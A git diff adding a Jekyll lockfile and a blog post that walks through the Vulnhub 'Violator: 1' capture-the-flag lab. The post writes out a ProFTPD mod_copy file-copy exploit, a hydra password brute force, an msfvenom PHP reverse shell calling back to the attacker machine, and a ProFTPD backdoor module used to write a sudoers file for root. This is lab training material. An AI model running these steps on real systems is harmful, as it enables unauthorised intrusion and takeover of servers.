diff --git a/Gemfile.lock b/Gemfile.lock
new file mode 100644
index 0000000..82672c4
--- /dev/null
+++ b/Gemfile.lock
@@ -0,0 +1,74 @@
+GEM
+ remote: https://ruby.taobao.org/
+ specs:
+ celluloid (0.16.0)
+ timers (~> 4.0.0)
+ chunky_png (1.3.6)
+ colorator (0.1)
+ compass (1.0.3)
+ chunky_png (~> 1.2)
+ compass-core (~> 1.0.2)
+ compass-import-once (~> 1.0.5)
+ rb-fsevent (>= 0.9.3)
+ rb-inotify (>= 0.9)
+ sass (>= 3.3.13, < 3.5)
+ compass-core (1.0.3)
+ multi_json (~> 1.0)
+ sass (>= 3.3.0, < 3.5)
+ compass-import-once (1.0.5)
+ sass (>= 3.2, < 3.5)
+ ffi (1.9.13)
+ hitimes (1.2.4)
+ jekyll (3.1.6)
+ colorator (~> 0.1)
+ jekyll-sass-converter (~> 1.0)
+ jekyll-watch (~> 1.1)
+ kramdown (~> 1.3)
+ liquid (~> 3.0)
+ mercenary (~> 0.3.3)
+ rouge (~> 1.7)
+ safe_yaml (~> 1.0)
+ jekyll-paginate (1.1.0)
+ jekyll-sass-converter (1.4.0)
+ sass (~> 3.4)
+ jekyll-watch (1.2.1)
+ listen (~> 2.7)
+ json (2.0.1)
+ kramdown (1.11.1)
+ liquid (3.0.6)
+ listen (2.10.1)
+ celluloid (~> 0.16.0)
+ rb-fsevent (>= 0.9.3)
+ rb-inotify (>= 0.9)
+ mercenary (0.3.6)
+ multi_json (1.12.1)
+ posix-spawn (0.3.11)
+ pygments.rb (0.6.3)
+ posix-spawn (~> 0.3.6)
+ yajl-ruby (~> 1.2.0)
+ rb-fsevent (0.9.7)
+ rb-inotify (0.9.7)
+ ffi (>= 0.5.0)
+ redcarpet (3.2.3)
+ rouge (1.11.1)
+ safe_yaml (1.0.4)
+ sass (3.4.22)
+ timers (4.0.4)
+ hitimes
+ yajl-ruby (1.2.1)
+
+PLATFORMS
+ ruby
+
+DEPENDENCIES
+ compass
+ jekyll
+ jekyll-paginate
+ jekyll-watch (~> 1.2.1)
+ json
+ kramdown
+ pygments.rb
+ redcarpet (~> 3.2.3)
+
+BUNDLED WITH
+ 1.12.5
diff --git a/_posts/2016-07-08-violator_walkthrough.md b/_posts/2016-07-08-violator_walkthrough.md
new file mode 100644
index 0000000..fcfa76d
--- /dev/null
+++ b/_posts/2016-07-08-violator_walkthrough.md
@@ -0,0 +1,350 @@
+---
+title: "Violator: 1, Vulnhub Walkthrough"
+layout: post
+category: writeup
+tags: [vulnhub, hacking]
+excerpt: "Walkthrough for Violator: 1 VM on Vulnhub"
+---
+
+ Before I begin, here's some hints given at the start of the vm:
+
+ - Vince Clarke can help you with the Fast Fashion.
+ - The challenge isn’t over with root. The flag is something special.
+ - I have put a few trolls in, but only to sport with you.
+
+# Get the IP and check for services
+
+```
+paul@archyoga [04:21:07] [~]
+-> % nmap -sn 192.168.1.0/24 | grep violator
+Nmap scan report for violator (192.168.1.108)
+paul@archyoga [04:21:36] [~]
+-> % nmap -p- -sV 192.168.1.108
+
+Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-09 16:21 EDT
+
+Nmap scan report for violator (192.168.1.108)
+Host is up (0.0086s latency).
+Not shown: 65533 closed ports
+PORT STATE SERVICE VERSION
+21/tcp open ftp ProFTPD 1.3.5rc3
+80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
+Service Info: OS: Unix
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds
+```
+
+So there's a website and an proFTPD v1.3.5rc3 server running on the machine. The website just says "I Say.. I say... I say boy! You're barkin up the wrong tree!" along with Foghorn Leghorn.
+
+However, in the source I found this: ```<-- https://en.wikipedia.org/wiki/Violator_(album) -->```
+
+I found an exploit through [http://exploit-db.com](http://exploit-db.com) for proFTPD 1.3.5 (CVE: 2015-3306) that allows you to copy files without logging into the server:
+
+I wasn't sure what to copy, so I just copied anything I could by copying ```/proc/self/root``` to ```/var/www/html/root```, this making everything except the root user directory accessible:
+
+```
+paul@archyoga [04:49:25] [~]
+-> % ftp 192.168.1.108
+Connected to 192.168.1.108.
+220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.108]
+Name (192.168.1.108:paul):
+331 Password required for paul
+Password:
+530 Login incorrect.
+ftp: Login failed.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> site cpfr /proc/self/root
+350 File or directory exists, ready for destination name
+ftp> site cpto /var/www/html/root
+250 Copy successful
+ftp>
+```
+
+Now you can easily see ```/etc/passwd```, all the home directories, and ```/etc/group``` to determine what to do next.
+
+```
+dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
+proftpd:x:104:65534::/var/run/proftpd:/bin/false
+ftp:x:105:65534::/srv/ftp:/bin/false
+mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
+af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
+aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
+```
+
+Notice ```dg, mg, af, and aw```, who are all members of Depeche Mode, which was referenced in an initial hint. I spent quite some time traversing their home directories, however I didn't have enough information to do anything yet. I found instructions for a Wermache enigma machine and some other hints, but I still needed key. I'll come back to this part in more detail later.
+
+# Get access to the server
+
+In ```/etc/group```, I can see that user ```dg``` is a member of several groups, so let's try to crack that password:
+
+The only possible solution I have for this is the link to the album for Violator.
+
+```
+paul@archyoga [06:13:59] [~]
+-> % cewl "https://en.wikipedia.org/wiki/Violator_(album)" -m 6 -w passwords.txt
+CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)
+
+paul@archyoga [06:23:38] [~]
+-> % tr '[:upper:]' '[:lower:]' < passwords.txt > passwords1.txt
+
+paul@archyoga [06:23:40] [~]
+-> % sed -i "s/ //g" passwords1.txt
+
+paul@archyoga [06:23:42] [~]
+-> % hydra -t 1 -l dg -P ./passwords1.txt -vV 192.168.1.108 ftp
+Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+...
+[21][ftp] host: 192.168.1.108 login: dg password: policyoftruth
+[STATUS] attack finished for 192.168.1.108 (valid pair found)
+1 of 1 target successfully completed, 1 valid password found
+```
+
+First I used cewl to generate a password list based on the given url, then removed all the spaces and converted everything to lowercase using ```tr``` and ```sed```.
+
+Now that I can actually create new files in the server, I generated a reverse php shell and used metasploit to get a shell on the machine:
+
+```
+paul@archyoga [11:03:11] [~]
+-> % msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=1337 R > exploit.php
+fatal: Not a git repository (or any of the parent directories): .git
+No platform was selected, choosing Msf::Module::Platform::PHP from the payload
+No Arch selected, selecting Arch: php from the payload
+No encoder or badchars specified, outputting raw payload
+Payload size: 949 bytes
+
+
+paul@archyoga [11:03:15] [~]
+-> % ftp 192.168.1.108
+Connected to 192.168.1.108.
+220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.108]
+Name (192.168.1.108:paul): dg
+331 Password required for dg
+Password:
+230 User dg logged in
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> cd /var/www/html/
+250 CWD command successful
+ftp> put exploit.php
+200 PORT command successful
+150 Opening BINARY mode data connection for exploit.php
+226 Transfer complete
+949 bytes sent in 6.8e-05 seconds (13.3 Mbytes/s)
+ftp> 221 Goodbye.
+
+paul@archyoga [11:04:14] [~]
+-> % msfconsole
+
+...
+msf > use exploit/multi/handler
+msf exploit(handler) > set lhost 192.168.1.109
+lhost => 192.168.1.109
+msf exploit(handler) > set lport 1337
+lport => 1337
+msf exploit(handler) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf exploit(handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.109:1337
+[*] Starting the payload handler...
+[*] Sending stage (33721 bytes) to 192.168.1.108
+[*] Meterpreter session 1 opened (192.168.1.109:1337 -> 192.168.1.108:43369) at 2016-07-09 23:05:11 -0400
+meterpreter > shell
+Process 1314 created.
+Channel 1 created.
+python -c 'import pty;pty.spawn("/bin/sh")'
+$ su dg
+su dg
+Password: policyoftruth
+
+dg@violator:/var/www/html$
+```
+
+If you don't have much experience with metasploit (especially reverse shells), you should probably research that to get used to it.
+
+# Getting Root
+
+Now, back to the home directories, if you go to ```http://192.168.1.108/root/home``` there's 4 directories for each of the 4 suspicious users we saw earlier: ```af, aw, dg, mg```. The directory for af contains minarke, a terminal based enigma emulator, which is suprisingly difficult to use, aw contains a hint reading ```You are getting close... Can you crack the final enigma..?Y```, mg contains instructions for a Wermacht enigma machine, and dg contains a very small filesystem with proftpd isntalled.
+
+Running ```sudo -l``` shows that user ```dg``` has permissions to run proftpd in this directory, however it only allows connections from 127.0.0.1. Once I ran it, I found out it is proftpd 1.3.3c.
+
+```
+dg@violator:/var/www/html$ sudo -l
+sudo -l
+Matching Defaults entries for dg on violator:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
+
+User dg may run the following commands on violator:
+ (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
+dg@violator:~/bd/sbin$ sudo /home/dg/bd/sbin/proftpd
+sudo /home/dg/bd/sbin/proftpd
+ - setting default address to 127.0.0.1
+localhost - SocketBindTight in effect, ignoring DefaultServer
+dg@violator:/var/www/html$ ftp localhost 2121
+ftp localhost 2121
+ftp: connect to address ::1: Connection refused
+Trying 127.0.0.1...
+Connected to localhost.
+220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
+```
+
+Then I added a port forward through metasploit so I could access it on my local machine:
+
+```
+dg@violator:/var/www/html$ ^C
+Terminate channel 0? [y/N] N
+[-] core_channel_interact: Operation failed: 1
+meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
+[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
+meterpreter >
+```
+
+Now you can access the internal proftpd server v1.3.3c from your machine:
+
+```
+paul@archyoga [01:45:03] [~]
+-> % telnet 127.0.0.1 2121
+Trying 127.0.0.1...
+Connected to 127.0.0.1.
+Escape character is '^]'.
+220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
+user dg
+331 Password required for dg
+pass policyoftruth
+230 User dg logged in
+```
+
+Now that I have metasploit port forwarding the ftp connection and I'm connected to it, I can use the exploit in proftpd 1.3.3c [https://www.exploit-db.com/exploits/15662/](https://www.exploit-db.com/exploits/15662/) with the metasploit module ```exploit/unix/ftp/proftpd_133c_backdoor``` along with the payload ```/cmd/unix/generic```
+
+First in the using the shell I wrote ```dg ALL=(ALL:ALL) ALL``` to ```/tmp/exploit``` since I'm using that to get root. Then I used the proftpd v1.3.3c exploit to actually copy it to the right directory:
+
+```
+msf > use exploit/unix/ftp/proftpd_133c_backdoor
+msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf exploit(proftpd_133c_backdoor) > set rport 2121
+rport => 2121
+msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf exploit(proftpd_133c_backdoor) > set cmd chmod 0440 /tmp/exploit && cp /tmp/exploit /etc/sudoers.d
+cmd => chmod 0440 /tmp/exploit && cp /tmp/exploit /etc/sudoers.d
+msf exploit(proftpd_133c_backdoor) > exploit
+
+[*] 127.0.0.1:2121 - Sending Backdoor Command
+[*] Exploit completed, but no session was created.
+```
+
+```
+dg@violator:/var/www/html$ sudo -l
+
+...
+User dg may run the following commands on violator:
+ (ALL : ALL) ALL
+ (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
+dg@violator:/var/www/html$ sudo su
+sudo su
+[sudo] password for dg: policyoftruth
+
+root@violator:/var/www/html# cd /root
+cd /root
+root@violator:~# ls
+ls
+flag.txt
+root@violator:~# cat flag.txt
+cat flag.txt
+I say... I say... I say boy! Pumping for oil or something...?
+---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
+```
+
+And that get's us the flag! Now for the final enigma.
+
+# The Final Enigma
+
+Within the root folder there's also a suspicious directory ```.basildon``` containing ```crocs.rar```
+
+```
+root@violator:~# ls -a
+ls -a
+. .. .bash_history .bashrc .basildon flag.txt .profile
+root@violator:~# cd .basildon
+cd .basildon
+root@violator:~/.basildon# ls -a
+ls -a
+. .. crocs.rar
+root@violator:~/.basildon# cp crocs.rar /var/www/html/
+cp crocs.rar /var/www/html/
+```
+
+Back on my local machine, I can see the contents of crocs.rar are password protected
+
+```
+paul@archyoga [02:17:20] [~/Downloads]
+-> % unrar e crocs.rar
+
+...
+Enter password (will not be echoed) for artwork.jpg:
+```
+
+I tried using the password list from eariler, but that didn't work so I did some googling about crocs and Depeche Mode and found out it is a night club they play at, so I added songs from that to the list and tried it again, and that didn't work either. I wasn't sure what else to try, so I regenerated the password list except didn't take any spaces out or change anything to lowercase, and sure enough it worked!
+
+```
+paul@archyoga [02:21:49] [~/Downloads]
+-> % rar2john crocs.rar > myhash
+paul@archyoga [02:25:11] [~/Downloads]
+-> % rar2john myhash --wordlist=~/passwords4.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
+Press 'q' or Ctrl-C to abort, almost any other key for status
+World in My Eyes (crocs.rar)
+```
+
+Inside ```crocs.rar``` there's just some album artwork, but running exiftool on it reveals a very suspicoius copyright and rights message:
+
+```
+UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQ
+LTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWK
+LSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUW
+ISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJM
+FVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLO
+ZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDV
+KFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGP
+FBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIA
+TOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHV
+CRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMW
+RHJEMUSGYBGWXJENRZHZ
+```
+
+I'm guessing this is the key for the enigma referenced in the home directories earlier.
+
+Using the instructions from the ```mg``` home folder I decrypted the code using [http://www.dcode.fr/enigma-machine-cipher](http://www.dcode.fr/enigma-machine-cipher) since the given minarke emulator was confusing to use.
+
+```
+Lyrics:
+
+* Use Wermacht with 3 rotors
+* Reflector to B
+Initial: A B C
+Alphabet Ring: C B A
+Plug Board A-B, C-D
+
+```
+
+
+```
+ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR
+THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL
+PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN
+CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE
+DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON
+YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING
+PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR
+SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING
+TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING
+AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN
+```
+
+There you go!
diff --git a/_site/404.html b/_site/404.html
index 60915e6..c6689d1 100644
--- a/_site/404.html
+++ b/_site/404.html
@@ -5,12 +5,12 @@